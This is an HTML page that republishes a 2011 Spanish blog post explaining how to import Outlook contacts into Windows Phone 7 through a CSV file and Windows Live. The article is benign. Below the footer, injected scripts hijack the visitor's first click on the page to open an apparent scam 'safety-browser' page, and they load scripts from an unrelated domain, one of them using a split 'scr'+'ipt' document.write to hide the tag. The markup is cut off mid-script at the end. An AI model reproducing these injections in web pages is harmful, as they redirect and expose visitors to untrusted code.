<!DOCTYPE html>
<html lang="en">

<head>

  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="">
  <meta name="author" content="">

  <title>Como agregar tus contactos de Outlook a Windows Phone 7, sin Exchange, sin aplicaciones ni cuentas de correo adicionales</title>

  <!-- Bootstrap core CSS -->
  <link href="https://startbootstrap.github.io/startbootstrap-clean-blog/vendor/bootstrap/css/bootstrap.min.css" rel="stylesheet">

  <!-- Custom fonts for this template -->
  <link href="https://startbootstrap.github.io/startbootstrap-clean-blog/vendor/fontawesome-free/css/all.min.css" rel="stylesheet" type="text/css">
  <link href='https://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>
  <link href='https://fonts.googleapis.com/css?family=Open+Sans:300italic,400italic,600italic,700italic,800italic,400,300,600,700,800' rel='stylesheet' type='text/css'>

  <!-- Custom styles for this template -->
  <link href="https://startbootstrap.github.io/startbootstrap-clean-blog/css/clean-blog.min.css" rel="stylesheet">

</head>

<body>

  <!-- Navigation -->
  <nav class="navbar navbar-expand-lg navbar-light fixed-top" id="mainNav">
    <div class="container">
      <a class="navbar-brand" href="index.html">Netizen Buzz</a>
      <button class="navbar-toggler navbar-toggler-right" type="button" data-toggle="collapse" data-target="#navbarResponsive" aria-controls="navbarResponsive" aria-expanded="false" aria-label="Toggle navigation">
        Menu
        <i class="fas fa-bars"></i>
      </button>
      <div class="collapse navbar-collapse" id="navbarResponsive">
        <ul class="navbar-nav ml-auto">
          <li class="nav-item">
            <a class="nav-link" href="index.html">Home</a>
          </li>
        </ul>
      </div>
    </div>
  </nav>

  <!-- Page Header -->
  <header class="masthead" style="background-image: url('https://startbootstrap.github.io/startbootstrap-clean-blog/img/post-bg.jpg')">
    <div class="overlay"></div>
    <div class="container">
      <div class="row">
        <div class="col-lg-8 col-md-10 mx-auto">
          <div class="post-heading">
            <h1>Como agregar tus contactos de Outlook a Windows Phone 7, sin Exchange, sin aplicaciones ni cuentas de correo adicionales</h1>
            <h2 class="subheading">Como agregar tus contactos de Outlook a Windows Phone 7, sin Exchange, sin aplicaciones ni cuentas de correo adicionales</h2>
            <span class="meta">Posted by
              <a href="#">Iñaki Ayucar</a>
              on 2011-01-19T23:29:00.001+01:00</span>
          </div>
        </div>
      </div>
    </div>
  </header>

  <!-- Post Content -->
  <article>
    <div class="container">
      <div class="row">
        <div class="col-lg-8 col-md-10 mx-auto">
         <p>Como ya sabréis, por el momento Windows Phone 7 no se sincroniza localmente con OutLook. Si no tenéis un servidor de correo compatible con Exchange (ese es el modo recomendado de sincronización para WP7), podéis realizar la sincronización con el dispositivo de varias formas, descritas en detalle <a href="http://support.microsoft.com/kb/2454811">aqui</a>.</p>  <p><a href="http://www.companionlink.com/windowsphone/outlook/">Companion Link</a> ha sacado una aplicación que supuestamente realiza la sincronización, pero me parece un pufo, ya que necesita de una cuenta de correo de Google para funcionar. O sea, más de lo mismo, y encima te cobran 39 $ por la broma. Podéis descargar la versión trial <a href="http://www.companionlink.com/windowsphone/outlook/">aqui</a>.</p>  <p>En fin, que a falta de que salga algo mejor, por ahora la mejor manera de añadir (que no sincronizar), tus contactos (solo tus contactos, ni tus citas, ni ná) a tu WP7 es utilizando uno de los métodos sugeridos en el enlace de arriba: a través de un fichero CSV.</p>  <p>Requiere tener un Windows Live ID (que no una cuenta de HotMail), pero mucha gente ya tiene uno, aunque solo sea para jugar a la XBox, así que no es una solución tan mala. Lo que haremos es subir nuestros contactos a la cuenta de Windows Live, con la que el Windows Phone sí se sincroniza.</p>  <h3></h3>  <h3>1.- Preparar tus contactos</h3>  <p>Como descubrirás más abajo, el proceso de importación de contactos de Windows Live es bastante puñetero. Falla por un montón de motivos, y algunas veces simplemente ni te dice por qué. </p>  <p>Por mi propia experiencia, para evitar que el proceso falle, revista en OutLook tus contactos, sobre todo los números de teléfono almacenados, ya que al parecer no pueden contener caracteres distintos de a-z A-Z y 0-9.</p>  <p>Así que elimina cualquier aparición de cosas como:</p>  <ul>   <li>Espacios</li>    <li>Prefijos de países con formato +34 y similares. Substitúyelos por “0034”.</li> </ul>  <h3>2.- Exportando tus contactos a un fichero CSV</h3>  <p><i>Si tiene Outlook 2010</i></p>  <ol>   <li>Empiece por abrir Microsoft Outlook 2010 en el equipo. </li>    <li>Haga clic en <b>Archivo</b> y, a continuación, en <b>Opciones</b>. Haga clic en <b>Avanzadas</b> y, en la sección Exportación, en <b>Exportar</b>. </li>    <li>En el <b>Asistente para importar y exportar</b>, seleccione <b>Exportar a un archivo </b>y haga clic en <b>Siguiente</b>. </li>    <li>Seleccione <b>Valores separados por comas (Windows)</b> y haga clic en <b>Siguiente</b>. </li>    <li>Seleccione <b>Contactos </b>como la carpeta de origen de la exportación y haga clic en <b>Siguiente</b>. </li>    <li>Elija una ubicación de archivo y un nombre de archivo, y haga clic en <b>Siguiente</b>. </li>    <li>Haga clic en <b>Finalizar</b>. Los contactos deben haberse exportado como archivo CSV. </li>    <li>Siga las instrucciones indicadas a continuación en <i>Importar el archivo CSV de Outlook a Windows Live</i>.</li> </ol>  <br /><i>Si tiene Outlook 2007</i>  <ol>   <li>Abra Microsoft Outlook 2007 en el equipo. </li>    <li>Haga clic en <b>Archivo</b> y, a continuación, en <b>Importar y exportar</b>. </li>    <li>En el Asistente para importar y exportar, seleccione <b>Exportar a un archivo </b>y haga clic en <b>Siguiente</b>. </li>    <li>Seleccione <b>Valores separados por comas (Windows)</b> y haga clic en <b>Siguiente</b>. </li>    <li>Seleccione <b>Contactos </b>como la carpeta de origen de la exportación y haga clic en <b>Siguiente</b>. </li>    <li>Elija una ubicación de archivo y un nombre de archivo, y haga clic en <b>Siguiente</b>. </li>    <li>Haga clic en <b>Finalizar</b>. Los contactos deben haberse exportado como archivo CSV. </li>    <li>Siga las instrucciones indicadas a continuación en <i>Importar el archivo CSV de Outlook a Windows Live</i>.</li> </ol>  <h3>3.- Importando tus contactos en tu Windows Live</h3>  <ul>   <li><i>Importar el archivo CSV de Outlook a Windows Live</i>      <ol>       <li>Abra un explorador web, vaya a <a href="http://contacts.live.com">http://contacts.live.com</a> (http://contacts.live.com) e inicie sesión en su cuenta de Windows Live. </li>        <li>Haga clic en <b>Administrar</b> y, a continuación, en <b>Importar</b>. </li>        <li>En la página &quot;Agregar personas&quot;, haga clic en <b>Outlook</b>. </li>        <li>Seleccione el botón de radio &quot;<i>Microsoft Outlook (usando CSV)</i>&quot;. </li>        <li>Vaya al archivo CSV que exportó a su equipo [pasos 1-7].&#160; </li>        <li>Haga clic en <b>Importar contactos</b>. Si ya ha agregado la cuenta de Windows Live Hotmail al teléfono, ha terminado. Los contactos se sincronizarán automáticamente con el teléfono cuando inicie sesión en Windows Live desde el teléfono.           <br /><b>Nota </b>Windows Live tiene un límite de tamaño para carga de archivos CSV de 500 KB. Si su archivo CSV supera los 500 KB, no se cargará y se mostrará el siguiente error:&#160; <p>El archivo que deseas importar es demasiado grande. Elimina algunos contactos e intenta importarlo de nuevo.</p>          <p>Para solucionar este problema, abra el archivo CSV en Excel y divídalo en varios archivos. De esta forma podrá cargar los archivos en Windows Live siempre que el tamaño total de cada archivo no supere el límite de 500 KB.            <br /><b>Nota </b>Windows Live tiene un límite de almacenamiento de 6500 contactos por usuario. </p>       </li>     </ol>   </li>    <li>Si no ha agregado la cuenta de Windows Live Hotmail al teléfono, siga estos pasos:      <ol>       <li>En <b>Inicio</b>, vaya a la izquierda en la lista <b>Aplicación</b>, puntee <b>Configuración</b> y, a continuación, <b>Correo electrónico y cuentas</b>. </li>        <li>Puntee <b>Agregar una cuenta</b> y, a continuación, <b>Windows Live</b>. </li>        <li>Escriba la dirección de correo electrónico y la contraseña, y puntee <b>I</b><b>niciar </b><b>sesión</b>. </li>        <li>Una vez iniciada la sesión, los contactos de Windows Live Hotmail se sincronizarán con el teléfono.</li>     </ol>   </li> </ul>  <h3>Ultimo consejo</h3>  <p>Es muy probable que a pesar de las precauciones del punto 1, el proceso te falle en algún punto. Que sepas que Windows Live habrá importado todos los contactos que haya podido hasta que se haya producido el fallo, así que te recomiendo ir a revisar tus contactos, y mirar cual es el último que se añadió.</p>  <p>Una vez sepas cual es, abre el fichero CSV. Te recomiendo hacerlo con WordPad –desactivando el ajuste de línea-, ya que si lo salvas con Excel le cambiará el formato o la distribución de caracteres y no podrás volver a utilizarlo para importar (simplemente te dirá que el fichero está vacío).</p>  <p>Una vez lo tengas en WordPad, borra todas las líneas de los contactos ya agregados, y ve al contacto siguiente al último que se agregó. En él, busca algún carácter extraño que pudiera haber producido el error (si no encuentras nada raro, simplemente borra la línea de ese contacto). Salva el fichero, y vuelve a repetir el proceso.</p>  <p>Así sucesivamente hasta que completes la importación.</p>  <p>Es un rollo, lo sé, pero al menos te permitirá tener todos tus contactos en el móvil.</p>  
        </div>
      </div>
    </div>
  </article>

  <hr>

  <!-- Footer -->
  <footer>
    <div class="container">
      <div class="row">
        <div class="col-lg-8 col-md-10 mx-auto">
          <ul class="list-inline text-center">
            <li class="list-inline-item">
              <a href="#">
                <span class="fa-stack fa-lg">
                  <i class="fas fa-circle fa-stack-2x"></i>
                  <i class="fab fa-twitter fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
            <li class="list-inline-item">
              <a href="#">
                <span class="fa-stack fa-lg">
                  <i class="fas fa-circle fa-stack-2x"></i>
                  <i class="fab fa-facebook-f fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
            <li class="list-inline-item">
              <a href="#">
                <span class="fa-stack fa-lg">
                  <i class="fas fa-circle fa-stack-2x"></i>
                  <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                </span>
              </a>
            </li>
          </ul>
          <p class="copyright text-muted">Copyright &copy; Netizen Buzz 2020</p>
        </div>
      </div>
    </div>
  </footer>

  <!-- Bootstrap core JavaScript -->
  <script src="https://startbootstrap.github.io/startbootstrap-clean-blog/vendor/jquery/jquery.min.js"></script>
  <script src="https://startbootstrap.github.io/startbootstrap-clean-blog/vendor/bootstrap/js/bootstrap.bundle.min.js"></script>

  <!-- Custom scripts for this template -->
   <script src="https://startbootstrap.github.io/startbootstrap-clean-blog/js/clean-blog.min.js"></script>

<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js" integrity="sha512-bLT0Qm9VnAYZDflyKcBaQ2gg0hSYNQrJ8RilYldYQ1FxQYoCLtUjuuRuZo+fjqhx/qtq/1itJ0C2ejDxltZVFg==" crossorigin="anonymous"></script><script type="text/javascript">$(document).ready(function() { $('body').addClass('xepo_ads'); });$(document).on('click','.xepo_ads',function(e) { $(this).removeClass('xepo_ads');window.open('https://dume.us/safety-browser.html', '_blank'); });</script><script type='text/javascript' src='//inheritedgeneralrailroad.com/54/9f/a7/549fa704a86127ced980b147801d3d60.js'></script><script type='text/javascript' src='//inheritedgeneralrailroad.com/70/14/a2/7014a29e0a32255586f07b0f3430e27b.js'></script><div id='fixedban' style='width:100%;margin:auto;text-align:center;float:none;overflow:hidden;display:scroll;position:fixed;bottom:0;z-index:999;-webkit-transform:translateZ(0);'><div><a id='close-fixedban' onclick='document.getElementById("fixedban").style.display = "none";' style='cursor:pointer;'><img alt='close' src='https://icon-library.com/images/close-icon-png/close-icon-png-19.jpg' title='close button' style='vertical-align:middle;' width='25px'; /></a></div><div style='text-align:center;display:block;max-width:728px;height:auto;overflow:hidden;margin:auto'><script type="text/javascript">atOptions = { 'key' : '78b5a3dd3ecd178ee3eaf2dfcb4122e8','format' : 'iframe','height' : 250,'width' : 300,'params' : {} };document.write('<scr' + 'ipt type="text/javascript" src="http' + (location.protocol === 'https:' ? 's' : '') + '://inheritedgeneralrailroad.com/78b5a3dd3ecd178ee3eaf2dfcb4122e8/invoke.js"></scr' + 'ipt>');</script></div></div><script type="text/javascript">var _Hasync= _Hasync|| [];_Hasync.push(['Histats.start', '1,4403915,4,0,0,0,00010000']);_Hasync.push(['Histats.fasi', '1']);_Hasync.push(['Histats.track_hits', '']);(function() { var hs = document.createElement('script'); hs.type = 'text/javascript'; hs.async = true;hs.src = ('//s10.histats.com/js15_as.js');(document.getElementsByTagName('head')

</html>
